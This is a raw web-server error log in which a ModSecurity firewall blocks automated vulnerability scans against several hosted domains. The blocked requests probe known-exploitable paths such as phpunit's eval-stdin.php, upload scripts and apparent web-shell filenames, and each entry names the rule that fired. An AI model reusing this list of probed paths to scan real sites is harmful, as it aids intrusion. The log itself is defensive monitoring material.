[Tue May 26 15:13:05.936558 2026] [security2:error] [pid 686593:tid 686791] [client 23.94.40.119:47904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/en/php/usb_sync.php"] [unique_id "ahVrKeilgkZcvx0_tl-8kgAAAMk"]
[Tue May 26 15:13:05.945748 2026] [security2:error] [pid 686593:tid 686752] [client 23.94.40.119:47940] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "webmail.pronumbers.com.au"] [uri "/avi/avigui/avigwt"] [unique_id "ahVrKeilgkZcvx0_tl-8lAAAAKI"]
[Tue May 26 15:13:05.952056 2026] [security2:error] [pid 686593:tid 686786] [client 23.94.40.119:47910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/pandora_console/ajax.php"] [unique_id "ahVrKeilgkZcvx0_tl-8lgAAAMQ"]
[Tue May 26 15:13:06.017875 2026] [security2:error] [pid 686593:tid 686850] [client 23.94.40.119:47946] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/upload/index.php"] [unique_id "ahVrKuilgkZcvx0_tl-8mwAAAQQ"]
[Tue May 26 15:13:06.240498 2026] [security2:error] [pid 686593:tid 686730] [client 23.94.40.119:47974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrKuilgkZcvx0_tl-8qQAAAIw"]
[Tue May 26 15:13:06.504726 2026] [security2:error] [pid 686593:tid 686811] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrKuilgkZcvx0_tl-8oQAAAN0"]
[Tue May 26 15:13:06.617026 2026] [security2:error] [pid 686593:tid 686780] [client 23.94.40.119:47988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php/change_config.php"] [unique_id "ahVrKuilgkZcvx0_tl-8swAAAL4"]
[Tue May 26 15:13:06.737782 2026] [security2:error] [pid 686593:tid 686820] [client 23.94.40.119:48006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVrKuilgkZcvx0_tl-8vgAAAOY"]
[Tue May 26 15:13:06.943411 2026] [security2:error] [pid 686593:tid 686771] [client 23.94.40.119:48050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php/setup.php"] [unique_id "ahVrKuilgkZcvx0_tl-8wwAAALU"]
[Tue May 26 15:13:07.033588 2026] [security2:error] [pid 686593:tid 686727] [client 23.94.40.119:48056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrK-ilgkZcvx0_tl-8xgAAAIk"]
[Tue May 26 15:13:07.334946 2026] [security2:error] [pid 686593:tid 686754] [client 23.94.40.119:48070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVrK-ilgkZcvx0_tl-81gAAAKQ"]
[Tue May 26 15:13:07.618923 2026] [security2:error] [pid 686593:tid 686774] [client 23.94.40.119:48078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/lib/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrK-ilgkZcvx0_tl-84AAAALg"]
[Tue May 26 15:13:07.816284 2026] [security2:error] [pid 686593:tid 686832] [client 23.94.40.119:34328] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/filemanager/upload.php"] [unique_id "ahVrK-ilgkZcvx0_tl-85wAAAPI"]
[Tue May 26 15:13:07.924232 2026] [security2:error] [pid 686593:tid 686770] [client 104.43.242.179:44085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrK-ilgkZcvx0_tl-87AAAALQ"]
[Tue May 26 15:13:07.932118 2026] [security2:error] [pid 686593:tid 686751] [client 23.94.40.119:34330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/lib/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVrK-ilgkZcvx0_tl-87QAAAKE"]
[Tue May 26 15:13:07.989542 2026] [security2:error] [pid 686593:tid 686826] [client 104.43.242.179:44085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrK-ilgkZcvx0_tl-88AAAAOw"]
[Tue May 26 15:13:08.055534 2026] [security2:error] [pid 686593:tid 686848] [client 104.43.242.179:44085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrLOilgkZcvx0_tl-88wAAAQI"]
[Tue May 26 15:13:08.125475 2026] [proxy:warn] [pid 686593:tid 686809] [client 47.236.41.23:38006] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 15:13:08.125516 2026] [proxy:error] [pid 686593:tid 686809] (70014)End of file found: [client 47.236.41.23:38006] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 47.236.41.23 ()
[Tue May 26 15:13:08.130586 2026] [security2:error] [pid 686593:tid 686834] [client 104.43.242.179:44085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/uwu.php"] [unique_id "ahVrLOilgkZcvx0_tl-89gAAAPQ"]
[Tue May 26 15:13:08.130689 2026] [security2:error] [pid 686593:tid 686834] [client 104.43.242.179:44085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/uwu.php"] [unique_id "ahVrLOilgkZcvx0_tl-89gAAAPQ"]
[Tue May 26 15:13:08.161286 2026] [security2:error] [pid 686593:tid 686771] [client 23.94.40.119:34332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrLOilgkZcvx0_tl-8-gAAALU"]
[Tue May 26 15:13:08.379337 2026] [security2:error] [pid 686593:tid 686830] [client 23.94.40.119:34336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrLOilgkZcvx0_tl-9CQAAAPA"]
[Tue May 26 15:13:08.568811 2026] [security2:error] [pid 686593:tid 686807] [client 47.236.41.23:38010] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahVrLOilgkZcvx0_tl-9FAAAANk"]
[Tue May 26 15:13:08.597975 2026] [security2:error] [pid 686593:tid 686774] [client 104.43.242.179:38705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/uwa.php"] [unique_id "ahVrLOilgkZcvx0_tl-9GAAAALg"]
[Tue May 26 15:13:08.598100 2026] [security2:error] [pid 686593:tid 686774] [client 104.43.242.179:38705] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/uwa.php"] [unique_id "ahVrLOilgkZcvx0_tl-9GAAAALg"]
[Tue May 26 15:13:08.600477 2026] [security2:error] [pid 686593:tid 686793] [client 23.94.40.119:34338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrLOilgkZcvx0_tl-9GQAAAMs"]
[Tue May 26 15:13:08.728754 2026] [security2:error] [pid 686593:tid 686817] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrLOilgkZcvx0_tl-9AQAAAOM"]
[Tue May 26 15:13:08.815679 2026] [security2:error] [pid 686593:tid 686728] [client 23.94.40.119:34348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrLOilgkZcvx0_tl-9IAAAAIo"]
[Tue May 26 15:13:09.035059 2026] [security2:error] [pid 686593:tid 686842] [client 23.94.40.119:34352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrLeilgkZcvx0_tl-9JwAAAPw"]
[Tue May 26 15:13:09.255363 2026] [security2:error] [pid 686593:tid 686729] [client 23.94.40.119:34364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrLeilgkZcvx0_tl-9MQAAAIs"]
[Tue May 26 15:13:10.340022 2026] [security2:error] [pid 686593:tid 686839] [client 104.43.242.179:25886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/crgio.php"] [unique_id "ahVrLuilgkZcvx0_tl-9bQAAAPk"]
[Tue May 26 15:13:10.340153 2026] [security2:error] [pid 686593:tid 686839] [client 104.43.242.179:25886] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/crgio.php"] [unique_id "ahVrLuilgkZcvx0_tl-9bQAAAPk"]
[Tue May 26 15:13:11.043592 2026] [security2:error] [pid 686593:tid 686728] [client 104.43.242.179:23164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/geforce.php"] [unique_id "ahVrL-ilgkZcvx0_tl-9hAAAAIo"]
[Tue May 26 15:13:11.043752 2026] [security2:error] [pid 686593:tid 686728] [client 104.43.242.179:23164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/geforce.php"] [unique_id "ahVrL-ilgkZcvx0_tl-9hAAAAIo"]
[Tue May 26 15:13:11.414499 2026] [security2:error] [pid 686593:tid 686734] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrLuilgkZcvx0_tl-9ggAAAJA"]
[Tue May 26 15:13:11.900414 2026] [security2:error] [pid 686593:tid 686729] [client 104.43.242.179:23154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/pucci.php"] [unique_id "ahVrL-ilgkZcvx0_tl-9mwAAAIs"]
[Tue May 26 15:13:11.900546 2026] [security2:error] [pid 686593:tid 686729] [client 104.43.242.179:23154] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/pucci.php"] [unique_id "ahVrL-ilgkZcvx0_tl-9mwAAAIs"]
[Tue May 26 15:13:12.357473 2026] [security2:error] [pid 686593:tid 686832] [client 104.43.242.179:21330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrMOilgkZcvx0_tl-9tQAAAPI"]
[Tue May 26 15:13:12.482332 2026] [security2:error] [pid 686593:tid 686750] [client 114.119.128.127:42563] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVrMOilgkZcvx0_tl-9ugAAAKA"], referer: http://glorodavionics.com/index.php?route=product/category&path=72_57_68
[Tue May 26 15:13:12.529557 2026] [security2:error] [pid 686593:tid 686806] [client 104.43.242.179:21330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrMOilgkZcvx0_tl-9vgAAANg"]
[Tue May 26 15:13:12.590178 2026] [security2:error] [pid 686593:tid 686814] [client 104.43.242.179:21330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/one.php"] [unique_id "ahVrMOilgkZcvx0_tl-9vwAAAOA"]
[Tue May 26 15:13:12.590310 2026] [security2:error] [pid 686593:tid 686814] [client 104.43.242.179:21330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/one.php"] [unique_id "ahVrMOilgkZcvx0_tl-9vwAAAOA"]
[Tue May 26 15:13:12.680683 2026] [security2:error] [pid 686593:tid 686808] [client 23.94.40.119:34412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrMOilgkZcvx0_tl-9wgAAANo"]
[Tue May 26 15:13:12.808089 2026] [security2:error] [pid 686593:tid 686725] [client 85.121.240.156:60232] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrMOilgkZcvx0_tl-9wQAAAIc"]
[Tue May 26 15:13:13.194745 2026] [security2:error] [pid 686593:tid 686752] [client 104.43.242.179:33128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-temp.php"] [unique_id "ahVrMeilgkZcvx0_tl-93QAAAKI"]
[Tue May 26 15:13:13.194864 2026] [security2:error] [pid 686593:tid 686752] [client 104.43.242.179:33128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/wp-temp.php"] [unique_id "ahVrMeilgkZcvx0_tl-93QAAAKI"]
[Tue May 26 15:13:13.218865 2026] [security2:error] [pid 686593:tid 686825] [client 23.94.40.119:34452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/web/google_analytics.php"] [unique_id "ahVrMeilgkZcvx0_tl-94QAAAOs"]
[Tue May 26 15:13:13.385908 2026] [security2:error] [pid 686593:tid 686751] [client 23.94.40.119:34462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/installer-backup.php"] [unique_id "ahVrMeilgkZcvx0_tl-95wAAAKE"]
[Tue May 26 15:13:13.555399 2026] [security2:error] [pid 686593:tid 686758] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrMeilgkZcvx0_tl-92gAAAKg"]
[Tue May 26 15:13:13.669096 2026] [security2:error] [pid 686593:tid 686814] [client 23.94.40.119:34464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ahVrMeilgkZcvx0_tl-99QAAAOA"], referer: https://webmail.pronumbers.com.au
[Tue May 26 15:13:14.260281 2026] [security2:error] [pid 686593:tid 686755] [client 104.43.242.179:44060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrMuilgkZcvx0_tl--CQAAAKU"]
[Tue May 26 15:13:14.345178 2026] [security2:error] [pid 686593:tid 686820] [client 104.43.242.179:44060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/xmu.php"] [unique_id "ahVrMuilgkZcvx0_tl--CwAAAOY"]
[Tue May 26 15:13:14.345330 2026] [security2:error] [pid 686593:tid 686820] [client 104.43.242.179:44060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/xmu.php"] [unique_id "ahVrMuilgkZcvx0_tl--CwAAAOY"]
[Tue May 26 15:13:15.104025 2026] [security2:error] [pid 686593:tid 686751] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrMuilgkZcvx0_tl--IwAAAKE"]
[Tue May 26 15:13:15.344179 2026] [security2:error] [pid 686593:tid 686808] [client 104.43.242.179:21345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/mode.php"] [unique_id "ahVrM-ilgkZcvx0_tl--PwAAANo"]
[Tue May 26 15:13:15.344274 2026] [security2:error] [pid 686593:tid 686808] [client 104.43.242.179:21345] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/mode.php"] [unique_id "ahVrM-ilgkZcvx0_tl--PwAAANo"]
[Tue May 26 15:13:15.416215 2026] [security2:error] [pid 686593:tid 686734] [client 23.94.40.119:34530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/type.php"] [unique_id "ahVrM-ilgkZcvx0_tl--RAAAAJA"]
[Tue May 26 15:13:16.020639 2026] [security2:error] [pid 686593:tid 686803] [client 23.94.40.119:34538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/data/cache_template/rss.tpl.php"] [unique_id "ahVrNOilgkZcvx0_tl--bAAAANU"]
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
[Tue May 26 15:13:16.456706 2026] [security2:error] [pid 686593:tid 686809] [client 23.94.40.119:34568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php/upload.php"] [unique_id "ahVrNOilgkZcvx0_tl--oQAAANs"], referer: https://webmail.pronumbers.com.au
